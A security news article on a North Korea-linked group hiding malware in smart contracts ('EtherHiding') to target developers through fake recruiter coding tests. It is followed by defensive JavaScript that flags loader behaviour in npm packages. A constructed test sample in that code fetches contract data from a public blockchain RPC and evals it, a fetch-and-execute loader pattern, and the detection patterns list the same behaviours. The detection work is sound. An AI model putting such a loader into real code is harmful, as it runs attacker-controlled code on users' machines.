North Korean Hackers Adopt “EtherHiding” to Conceal Malware in Smart Contracts
A North Korean–linked group has, for the first time, adopted EtherHiding — a technique that conceals malicious code inside smart contracts on public blockchains and swaps payloads on the fly. Google’s Threat Intelligence Team attributes the technique to UNC5342 (also tracked as CL-STA-0240 by Palo Alto Networks, DeceptiveDevelopment by ESET, and DEVPOPPER by Securonix).
The delivery follows the playbook of a long-running campaign known as Contagious Interview: operators approach developers on LinkedIn posing as recruiters, move the conversation to Telegram or Discord, and under the pretense of a coding test coerce targets into executing malicious code. The objective is unauthorized access to developer workstations for data theft and theft of crypto assets.
Google reports observing EtherHiding since February 2025. Attackers embed code in a smart contract on chains such as BNB Smart Chain or Ethereum, using the blockchain as a decentralized “dead drop” — an infrastructure resistant to takedown and censorship. Transaction pseudonymity complicates attribution of contract deployments, and a controller address can refresh the malicious payload at will. With average gas fees around $1.37, operators can pivot tactics and swap modules rapidly. Mandiant warns that state-linked actors’ embrace of such mechanisms increases campaign survivability and accelerates adaptation to new targets.
In practice, the compromise unfolds in stages after an initial social-engineering lure in messaging apps. The intrusion affects Windows, macOS, and Linux hosts alike. A bootstrapper — disguised as an npm package — is executed first. Next, BeaverTail, a JavaScript stealer, harvests crypto-wallet data, browser-extension contents, and saved credentials. A second JS loader, JADESNOW, then queries Ethereum to fetch InvisibleFerret — a JavaScript port of a previously observed Python backdoor — which establishes remote control and enables prolonged exfiltration from wallets like MetaMask and Phantom as well as password managers such as 1Password.
Operators may also pull a portable Python interpreter and run a separate credential-theft module stored at a different blockchain address. Occasionally multiple chains are used concurrently to harden the delivery channel and confound remediation.
This technique raises the bar for defenders: it resists takedowns and law-enforcement action, complicates artifact analysis, and forces security teams to monitor not only domains and hosting but also the referential logic of smart contracts, on-chain addresses, and characteristic RPC calls. Developers targeted via LinkedIn are particularly vulnerable — they often possess wallets, access to repositories and build infrastructure, and installed toolchains that lend themselves to supply-chain exploitation.
The campaign marks a clear pivot toward misusing blockchain platforms as distributed command-and-control and delivery infrastructure for malware. Defensive teams should instrument transactional pattern detection, surveil smart-contract interactions, and bake blockchain-centric indicators — addresses, method signatures, and provider RPC behaviors — into their analytics; without such measures, spotting and disrupting these chains will become increasingly difficult.
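As an added illustration of what such instrumentation can look like on the endpoint side, the following static triage heuristic is example code written for this article, not Google's, Mandiant's or any vendor's detection logic. It scores JavaScript from a suspicious npm package for the loader behaviours described above (an eth_call against a public chain RPC, a contract address, hex decoding of the returned blob, dynamic execution of the result) and flags install-time lifecycle hooks; the RPC host list and both input samples are assumed and constructed.

```javascript
// Added example, not any vendor's detection logic: a static triage heuristic for
// JavaScript pulled from a suspicious npm package. It flags the loader behaviours
// the article describes: an eth_call state read against a public chain RPC, a
// contract address, hex decoding of the blob, and dynamic execution of the result.
const INDICATORS = {
  ethCall: /["']eth_call["']/,                                   // on-chain state read
  publicRpc: /https?:\/\/[a-z0-9.-]*(?:infura\.io|alchemy\.com|binance\.org|ankr\.com|publicnode\.com)/i,
  contractAddress: /\b0x[0-9a-fA-F]{40}\b/,                     // 20-byte EVM address
  hexDecode: /["']hex["']|parseInt\([^,]*,\s*16\)|fromCharCode/, // ABI blob -> text
  dynamicExec: /\b(?:eval|Function|vm\.runInThisContext)\s*\(/,  // run fetched code
};

function scoreEtherHidingIndicators(source) {
  const hits = {};
  for (const [name, re] of Object.entries(INDICATORS)) hits[name] = re.test(source);
  const count = Object.values(hits).filter(Boolean).length;
  // Reading contract state and executing what comes back is what merits escalation;
  // a dapp that only reads balances hits eth_call without dynamicExec.
  const verdict = hits.ethCall && hits.dynamicExec ? 'escalate' : count >= 3 ? 'review' : 'benign';
  return { hits, count, verdict };
}

// Whole-package triage: install-time lifecycle hooks plus per-file scores.
// pkg = { manifest: parsed package.json, files: { path: source } }
function triagePackage(pkg) {
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  const lifecycleHooks = ['preinstall', 'install', 'postinstall'].filter((k) => k in scripts);
  const findings = Object.entries(pkg.files)
    .map(([path, src]) => ({ path, ...scoreEtherHidingIndicators(src) })).filter((f) => f.verdict !== 'benign');
  return { lifecycleHooks, findings };
}

// Constructed samples (not real malware): a loader-shaped snippet and an ordinary
// dapp balance read. The RPC host list above and these inputs are assumptions.
const SUSPICIOUS_SAMPLE = `
const body = JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{ to: "0x0000000000000000000000000000000000000000", data: "0x00000000" }, "latest"] });
fetch("https://bsc-dataseed1.binance.org/", { method: "POST", body }).then((r) => r.json())
  .then((j) => eval(Buffer.from(j.result.slice(2), "hex").toString()));
`;
const BENIGN_SAMPLE = `
const bal = await provider.send("eth_call",
  [{ to: "0x0000000000000000000000000000000000000000", data: "0x70a08231" }, "latest"]);
console.log(BigInt(bal));
`;
const report = triagePackage({
  manifest: { name: 'coding-test', scripts: { postinstall: 'node setup.js' } },
  files: { 'setup.js': SUSPICIOUS_SAMPLE, 'lib/balance.js': BENIGN_SAMPLE },
});
console.log(JSON.stringify(report, null, 2));
```

The benign sample also performs an eth_call and names a contract address, so the verdict hinges on the fetch-then-execute combination and the install hook rather than on blockchain interaction alone.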